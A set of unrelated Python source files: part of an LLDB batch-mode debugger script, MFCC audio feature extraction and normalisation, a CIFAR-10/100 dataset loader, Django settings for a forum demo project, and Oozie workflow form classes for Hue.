print(res.GetError())
def start_breakpoint_listener(target):
"Listens for breakpoints being added and adds new ones to the callback registration list"
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target = listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"Starts a watchdog thread that will terminate the process after a certain period of time"
watchdog_start_time = time.clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while time.clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target = watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " + str(target_error) +
". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file = sys.stderr)
print(e, file = sys.stderr)
print("Aborting.", file = sys.stderr)
sys.exit(1)
finally:
script_file.close()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import librosa
import numpy
import scipy
def feature_extraction_lfcc(audio_filename_with_path, statistics=True):
print audio_filename_with_path
with open(audio_filename_with_path,'r') as f:
feature_matrix = numpy.loadtxt(f)
#f.close()
# Collect into data structure
# print feature_matrix.shape
if statistics:
return {
'feat': feature_matrix,
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
else:
return {
'feat': feature_matrix}
def feature_extraction(y, fs=44100, statistics=True, include_mfcc0=True, include_delta=True,
include_acceleration=True, mfcc_params=None, delta_params=None, acceleration_params=None):
"""Feature extraction, MFCC based features
Outputs features in dict, format:
{
'feat': feature_matrix [shape=(frame count, feature vector size)],
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
Parameters
----------
y: numpy.array [shape=(signal_length, )]
Audio
fs: int > 0 [scalar]
Sample rate
(Default value=44100)
statistics: bool
Calculate feature statistics for extracted matrix
(Default value=True)
include_mfcc0: bool
Include 0th MFCC coefficient into static coefficients.
(Default value=True)
include_delta: bool
Include delta MFCC coefficients.
(Default value=True)
include_acceleration: bool
Include acceleration MFCC coefficients.
(Default value=True)
mfcc_params: dict or None
Parameters for extraction of static MFCC coefficients.
delta_params: dict or None
Parameters for extraction of delta MFCC coefficients.
acceleration_params: dict or None
Parameters for extraction of acceleration MFCC coefficients.
Returns
-------
result: dict
Feature dict
"""
eps = numpy.spacing(1)
# Windowing function
if mfcc_params['window'] == 'hamming_asymmetric':
window = scipy.signal.hamming(mfcc_params['n_fft'], sym=False)
elif mfcc_params['window'] == 'hamming_symmetric':
window = scipy.signal.hamming(mfcc_params['n_fft'], sym=True)
elif mfcc_params['window'] == 'hann_asymmetric':
window = scipy.signal.hann(mfcc_params['n_fft'], sym=False)
elif mfcc_params['window'] == 'hann_symmetric':
window = scipy.signal.hann(mfcc_params['n_fft'], sym=True)
else:
window = None
# Calculate Static Coefficients
magnitude_spectrogram = numpy.abs(librosa.stft(y + eps,
n_fft=mfcc_params['n_fft'],
win_length=mfcc_params['win_length'],
hop_length=mfcc_params['hop_length'],
center=True,
window=window)) ** 2
mel_basis = librosa.filters.mel(sr=fs,
n_fft=mfcc_params['n_fft'],
n_mels=mfcc_params['n_mels'],
fmin=mfcc_params['fmin'],
fmax=mfcc_params['fmax'],
htk=mfcc_params['htk'])
mel_spectrum = numpy.dot(mel_basis, magnitude_spectrogram)
mfcc = librosa.feature.mfcc(S=librosa.logamplitude(mel_spectrum),
n_mfcc=mfcc_params['n_mfcc'])
# Collect the feature matrix
feature_matrix = mfcc
if include_delta:
# Delta coefficients
mfcc_delta = librosa.feature.delta(mfcc, **delta_params)
# Add Delta Coefficients to feature matrix
feature_matrix = numpy.vstack((feature_matrix, mfcc_delta))
if include_acceleration:
# Acceleration coefficients (aka delta)
mfcc_delta2 = librosa.feature.delta(mfcc, order=2, **acceleration_params)
# Add Acceleration Coefficients to feature matrix
feature_matrix = numpy.vstack((feature_matrix, mfcc_delta2))
if not include_mfcc0:
# Omit mfcc0
feature_matrix = feature_matrix[1:, :]
feature_matrix = feature_matrix.T
# Collect into data structure
if statistics:
return {
'feat': feature_matrix,
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
else:
return {
'feat': feature_matrix}
class FeatureNormalizer(object):
"""Feature normalizer class
Accumulates feature statistics
Examples
--------
>>> normalizer = FeatureNormalizer()
>>> for feature_matrix in training_items:
>>> normalizer.accumulate(feature_matrix)
>>>
>>> normalizer.finalize()
>>> for feature_matrix in test_items:
>>> feature_matrix_normalized = normalizer.normalize(feature_matrix)
>>> # used the features
"""
def __init__(self, feature_matrix=None):
"""__init__ method.
Parameters
----------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)] or None
Feature matrix to be used in the initialization
"""
if feature_matrix is None:
self.N = 0
self.mean = 0
self.S1 = 0
self.S2 = 0
self.std = 0
else:
self.mean = numpy.mean(feature_matrix, axis=0)
self.std = numpy.std(feature_matrix, axis=0)
self.N = feature_matrix.shape[0]
self.S1 = numpy.sum(feature_matrix, axis=0)
self.S2 = numpy.sum(feature_matrix ** 2, axis=0)
self.finalize()
def __enter__(self):
# Initialize Normalization class and return it
self.N = 0
self.mean = 0
self.S1 = 0
self.S2 = 0
self.std = 0
return self
def __exit__(self, type, value, traceback):
# Finalize accumulated calculation
self.finalize()
def accumulate(self, stat):
"""Accumalate statistics
Input is statistics dict, format:
{
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
Parameters
----------
stat : dict
Statistics dict
Returns
-------
nothing
"""
self.N += stat['N']
self.mean += stat['mean']
self.S1 += stat['S1']
self.S2 += stat['S2']
def finalize(self):
"""Finalize statistics calculation
Accumulated values are used to get mean and std for the seen feature data.
Parameters
----------
nothing
Returns
-------
nothing
"""
# Finalize statistics
self.mean = self.S1 / self.N
self.std = numpy.sqrt((self.N * self.S2 - (self.S1 * self.S1)) / (self.N * (self.N - 1)))
# In case we have very brain-death material we get std = Nan => 0.0
self.std = numpy.nan_to_num(self.std)
self.mean = numpy.reshape(self.mean, [1, -1])
self.std = numpy.reshape(self.std, [1, -1])
def normalize(self, feature_matrix):
"""Normalize feature matrix with internal statistics of the class
Parameters
----------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)]
Feature matrix to be normalized
Returns
-------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)]
Normalized feature matrix
"""
return (feature_matrix - self.mean) / self.std
|
|
# -*- coding: utf-8 -*-
# File: cifar.py
# Yukun Chen <cykustc@gmail.com>
import numpy as np
import os
import pickle
import tarfile
from ...utils import logger
from ...utils.fs import download, get_dataset_path
from ..base import RNGDataFlow
__all__ = ['CifarBase', 'Cifar10', 'Cifar100']
DATA_URL_CIFAR_10 = ('http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz', 170498071)
DATA_URL_CIFAR_100 = ('http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz', 169001437)
def maybe_download_and_extract(dest_directory, cifar_classnum):
"""Download and extract the tarball from Alex's website. Copied from tensorflow example """
assert cifar_classnum == 10 or cifar_classnum == 100
if cifar_classnum == 10:
cifar_foldername = 'cifar-10-batches-py'
else:
cifar_foldername = 'cifar-100-python'
if os.path.isdir(os.path.join(dest_directory, cifar_foldername)):
logger.info("Found cifar{} data in {}.".format(cifar_classnum, dest_directory))
return
else:
DATA_URL = DATA_URL_CIFAR_10 if cifar_classnum == 10 else DATA_URL_CIFAR_100
filename = DATA_URL[0].split('/')[-1]
filepath = os.path.join(dest_directory, filename)
download(DATA_URL[0], dest_directory, expect_size=DATA_URL[1])
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def read_cifar(filenames, cifar_classnum):
assert cifar_classnum == 10 or cifar_classnum == 100
ret = []
for fname in filenames:
fo = open(fname, 'rb')
dic = pickle.load(fo, encoding='bytes')
data = dic[b'data']
if cifar_classnum == 10:
label = dic[b'labels']
IMG_NUM = 10000 # cifar10 data are split into blocks of 10000
else:
label = dic[b'fine_labels']
IMG_NUM = 50000 if 'train' in fname else 10000
fo.close()
for k in range(IMG_NUM):
img = data[k].reshape(3, 32, 32)
img = np.transpose(img, [1, 2, 0])
ret.append([img, label[k]])
return ret
def get_filenames(dir, cifar_classnum):
assert cifar_classnum == 10 or cifar_classnum == 100
if cifar_classnum == 10:
train_files = [os.path.join(
dir, 'cifar-10-batches-py', 'data_batch_%d' % i) for i in range(1, 6)]
test_files = [os.path.join(
dir, 'cifar-10-batches-py', 'test_batch')]
meta_file = os.path.join(dir, 'cifar-10-batches-py', 'batches.meta')
elif cifar_classnum == 100:
train_files = [os.path.join(dir, 'cifar-100-python', 'train')]
test_files = [os.path.join(dir, 'cifar-100-python', 'test')]
meta_file = os.path.join(dir, 'cifar-100-python', 'meta')
return train_files, test_files, meta_file
def _parse_meta(filename, cifar_classnum):
with open(filename, 'rb') as f:
obj = pickle.load(f)
return obj['label_names' if cifar_classnum == 10 else 'fine_label_names']
class CifarBase(RNGDataFlow):
"""
Produces [image, label] in Cifar10/100 dataset,
image is 32x32x3 in the range [0,255].
label is an int.
"""
def __init__(self, train_or_test, shuffle=None, dir=None, cifar_classnum=10):
"""
Args:
train_or_test (str): 'train' or 'test'
shuffle (bool): defaults to True for training set.
dir (str): path to the dataset directory
cifar_classnum (int): 10 or 100
"""
assert train_or_test in ['train', 'test']
assert cifar_classnum == 10 or cifar_classnum == 100
self.cifar_classnum = cifar_classnum
if dir is None:
dir = get_dataset_path('cifar{}_data'.format(cifar_classnum))
maybe_download_and_extract(dir, self.cifar_classnum)
train_files, test_files, meta_file = get_filenames(dir, cifar_classnum)
if train_or_test == 'train':
self.fs = train_files
else:
self.fs = test_files
for f in self.fs:
if not os.path.isfile(f):
raise ValueError('Failed to find file: ' + f)
self._label_names = _parse_meta(meta_file, cifar_classnum)
self.train_or_test = train_or_test
self.data = read_cifar(self.fs, cifar_classnum)
self.dir = dir
if shuffle is None:
shuffle = train_or_test == 'train'
self.shuffle = shuffle
def __len__(self):
return 50000 if self.train_or_test == 'train' else 10000
def __iter__(self):
idxs = np.arange(len(self.data))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
# since cifar is quite small, just do it for safety
yield self.data[k]
def get_per_pixel_mean(self, names=('train', 'test')):
"""
Args:
names (tuple[str]): the names ('train' or 'test') of the datasets
Returns:
a mean image of all images in the given datasets, with size 32x32x3
"""
for name in names:
assert name in ['train', 'test'], name
train_files, test_files, _ = get_filenames(self.dir, self.cifar_classnum)
all_files = []
if 'train' in names:
all_files.extend(train_files)
if 'test' in names:
all_files.extend(test_files)
all_imgs = [x[0] for x in read_cifar(all_files, self.cifar_classnum)]
arr = np.array(all_imgs, dtype='float32')
mean = np.mean(arr, axis=0)
return mean
def get_label_names(self):
"""
Returns:
[str]: name of each class.
"""
return self._label_names
def get_per_channel_mean(self, names=('train', 'test')):
"""
Args:
names (tuple[str]): the names ('train' or 'test') of the datasets
Returns:
An array of three values as mean of each channel, for all images in the given datasets.
"""
mean = self.get_per_pixel_mean(names)
return np.mean(mean, axis=(0, 1))
class Cifar10(CifarBase):
"""
Produces [image, label] in Cifar10 dataset,
image is 32x32x3 in the range [0,255].
label is an int.
"""
def __init__(self, train_or_test, shuffle=None, dir=None):
"""
Args:
train_or_test (str): either 'train' or 'test'.
shuffle (bool): shuffle the dataset, default to shuffle in training
"""
super(Cifar10, self).__init__(train_or_test, shuffle, dir, 10)
class Cifar100(CifarBase):
""" Similar to Cifar10"""
def __init__(self, train_or_test, shuffle=None, dir=None):
super(Cifar100, self).__init__(train_or_test, shuffle, dir, 100)
if __name__ == '__main__':
ds = Cifar10('train')
mean = ds.get_per_channel_mean()
print(mean)
import cv2
ds.reset_state()
for i, dp in enumerate(ds):
if i == 100:
break
img = dp[0]
cv2.imwrite("{:04d}.jpg".format(i), img)
|
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core.urlresolvers import reverse_lazy
from unipath import Path
from machina import get_apps as get_machina_apps
from machina import MACHINA_MAIN_STATIC_DIR
from machina import MACHINA_MAIN_TEMPLATE_DIR
PROJECT_PATH = Path(__file__).ancestor(3)
# APP CONFIGURATION
# ------------------------------------------------------------------------------
INSTALLED_APPS = [
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
# Third party apps
'mptt',
'haystack',
'widget_tweaks',
'ckeditor',
] + get_machina_apps([
'demo.apps.forum_conversation',
'demo.apps.forum_member',
])
# MIGRATION CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'forum_conversation': 'machina.apps.forum_conversation.migrations',
'forum_member': 'machina.apps.forum_member.migrations',
}
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.gzip.GZipMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# Machina
'machina.apps.forum_permission.middleware.ForumPermissionMiddleware',
)
# DEBUG CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': PROJECT_PATH.child('test.db'),
}
}
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'EST'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#languages
LANGUAGES = (
('en', 'English'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = (
PROJECT_PATH.child('demo_project', 'locale'),
)
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = 'NOTSECRET'
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (
PROJECT_PATH.child('demo', 'templates'),
MACHINA_MAIN_TEMPLATE_DIR,
),
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
# Machina
'machina.core.context_processors.metadata',
],
'loaders': [
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
]
},
},
]
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = PROJECT_PATH.child('public', 'static')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
MACHINA_MAIN_STATIC_DIR,
PROJECT_PATH.child('demo', 'static', 'build'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-STATICFILES_STORAGE
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = PROJECT_PATH.child('public', 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL CONFIGURATION
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'demo_project.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
# ADMIN CONFIGURATION
# ------------------------------------------------------------------------------
# URL of the admin page
ADMIN_URL = 'admin/'
# AUTH CONFIGURATION
# ------------------------------------------------------------------------------
LOGIN_URL = reverse_lazy('login')
# CACHE CONFIGURATION
# ------------------------------------------------------------------------------
# Attachment cache backend
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'machina_attachments': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/tmp',
}
}
# CKEDITOR CONFIGURATION
# ------------------------------------------------------------------------------
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'Custom',
'toolbar_Custom': [
{'name': 'clipboard', 'items': ['Undo', 'Redo', ]},
{'name': 'insert', 'items': ['Image', 'Table', 'HorizontalRule', 'Smiley',
'SpecialChar', 'PageBreak', ]},
{'name': 'styles', 'items': ['Styles', 'Format', ]},
{'name': 'basicstyles', 'items': ['Bold', 'Italic', 'Strike', '-', 'RemoveFormat', ]},
{'name': 'paragraph', 'items': ['NumberedList', 'BulletedList', '-', 'Outdent',
'Indent', '-', 'Blockquote', ]},
{'name': 'links', 'items': ['Link', 'Unlink', 'Anchor', ]},
{'name': 'tools', 'items': ['Maximize', ]},
],
}
}
# HAYSTACK CONFIGURATION
# ------------------------------------------------------------------------------
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': PROJECT_PATH.child('whoosh_index'),
},
}
# MACHINA SETTINGS
# ------------------------------------------------------------------------------
MACHINA_DEFAULT_AUTHENTICATED_USER_FORUM_PERMISSIONS = [
'can_see_forum',
'can_read_forum',
'can_start_new_topics',
'can_reply_to_topics',
'can_edit_own_posts',
'can_post_without_approval',
'can_create_polls',
'can_vote_in_polls',
'can_download_file',
]
MACHINA_MARKUP_LANGUAGE = None
MACHINA_MARKUP_WIDGET = 'ckeditor.widgets.CKEditorWidget'
|
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from datetime import datetime, timedelta
from django import forms
from django.db.models import Q
from django.core.exceptions import ValidationError
from django.forms.widgets import TextInput
from django.utils.functional import curry
from django.utils.translation import ugettext_lazy as _t
from desktop.lib.django_forms import MultiForm, SplitDateTimeWidget
from oozie.models import Workflow, Node, Java, Mapreduce, Streaming, Coordinator,\
Dataset, DataInput, DataOutput, Pig, Link, Hive, Sqoop, Ssh, Shell, DistCp, Fs,\
Email, SubWorkflow, Generic, Bundle, BundledCoordinator
LOG = logging.getLogger(__name__)
class ParameterForm(forms.Form):
name = forms.CharField(max_length=40, widget=forms.widgets.HiddenInput())
value = forms.CharField(max_length=1024, required=False)
NON_PARAMETERS = (
'user.name',
'oozie.wf.rerun.failnodes',
'oozie.wf.rerun.skip.nodes',
'oozie.wf.application.path',
'oozie.coord.application.path',
'oozie.bundle.application.path',
'mapreduce.job.user.name',
'wf_application_path',
'jobTracker',
'nameNode',
'hue-id-w',
'hue-id-c',
'hue-id-b',
)
@staticmethod
def get_initial_params(conf_dict):
params = filter(lambda key: key not in ParameterForm.NON_PARAMETERS, conf_dict.keys())
return [{'name': name, 'value': conf_dict[name]} for name in params]
class WorkflowForm(forms.ModelForm):
class Meta:
model = Workflow
exclude = ('owner', 'start', 'end')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'deployment_dir': forms.TextInput(attrs={'class': 'pathChooser span7'}),
'parameters': forms.widgets.HiddenInput(),
'job_xml': forms.widgets.TextInput(attrs={'class': 'pathChooser span7'}),
'job_properties': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super(WorkflowForm, self).__init__(*args, **kwargs)
SCHEMA_VERSION_CHOICES = ['0.4']
class ImportWorkflowForm(WorkflowForm):
definition_file = forms.FileField(label=_t("Local workflow.xml file"))
resource_archive = forms.FileField(label=_t("Workflow resource archive (zip)"), required=False)
class ImportJobsubDesignForm(forms.Form):
"""Used for specifying what oozie actions to import"""
def __init__(self, choices=[], *args, **kwargs):
super(ImportJobsubDesignForm, self).__init__(*args, **kwargs)
self.fields['jobsub_id'] = forms.ChoiceField(choices=choices, widget=forms.RadioSelect(attrs={'class':'radio'}))
class NodeForm(forms.ModelForm):
class Meta:
ALWAYS_HIDE = ('workflow', 'children', 'node_type')
model = Node
exclude = ALWAYS_HIDE
class NodeMetaForm(forms.ModelForm):
class Meta:
ALWAYS_HIDE = ('workflow', 'children', 'node_type')
model = Node
exclude = ALWAYS_HIDE + ('name', 'description')
class JavaForm(forms.ModelForm):
class Meta:
model = Java
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'files': forms.HiddenInput(),
'archives': forms.HiddenInput(),
'jar_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'main_class': forms.TextInput(attrs={'class': 'span5'}),
'args': forms.TextInput(attrs={'class': 'span5'}),
'java_opts': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class MapreduceForm(forms.ModelForm):
"""Used for specifying a mapreduce action"""
class Meta:
model = Mapreduce
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'files': forms.HiddenInput(),
'archives': forms.HiddenInput(),
'jar_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class StreamingForm(forms.ModelForm):
"""Used for specifying a streaming action"""
class Meta:
model = Streaming
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
'mapper': forms.TextInput(attrs={'class': 'span5'}),
'reducer': forms.TextInput(attrs={'class': 'span5'}),
}
class PigForm(forms.ModelForm):
class Meta:
model = Pig
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class HiveForm(forms.ModelForm):
class Meta:
model = Hive
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class SqoopForm(forms.ModelForm):
class Meta:
model = Sqoop
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'script_path': forms.Textarea(attrs={'class': 'span8'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class SshForm(forms.ModelForm):
class Meta:
model = Ssh
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'params': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
}
class ShellForm(forms.ModelForm):
class Meta:
model = Shell
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'files': forms.widgets.HiddenInput(),
'archives': forms.widgets.HiddenInput(),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class DistCpForm(forms.ModelForm):
class Meta:
model = DistCp
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'params': forms.widgets.HiddenInput(),
'command': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class FsForm(forms.ModelForm):
class Meta:
model = Fs
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'deletes': forms.widgets.HiddenInput(),
'mkdirs': forms.widgets.HiddenInput(),
'moves': forms.widgets.HiddenInput(),
'chmods': forms.widgets.HiddenInput(),
'touchzs': forms.widgets.HiddenInput(),
}
class EmailForm(forms.ModelForm):
class Meta:
model = Email
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'to': forms.TextInput(attrs={'class': 'span8'}),
'cc': forms.TextInput(attrs={'class': 'span8'}),
'subject': forms.TextInput(attrs={'class': 'span8'}),
'body': forms.Textarea(attrs={'class': 'span8'}),
}
class SubWorkflowForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
workflow = kwargs.pop('workflow')
super(SubWorkflowForm, self).__init__(*args, **kwargs)
choices=((wf.id, wf) for wf in Workflow.objects.available().filter(owner=user).exclude(id=workflow.id))
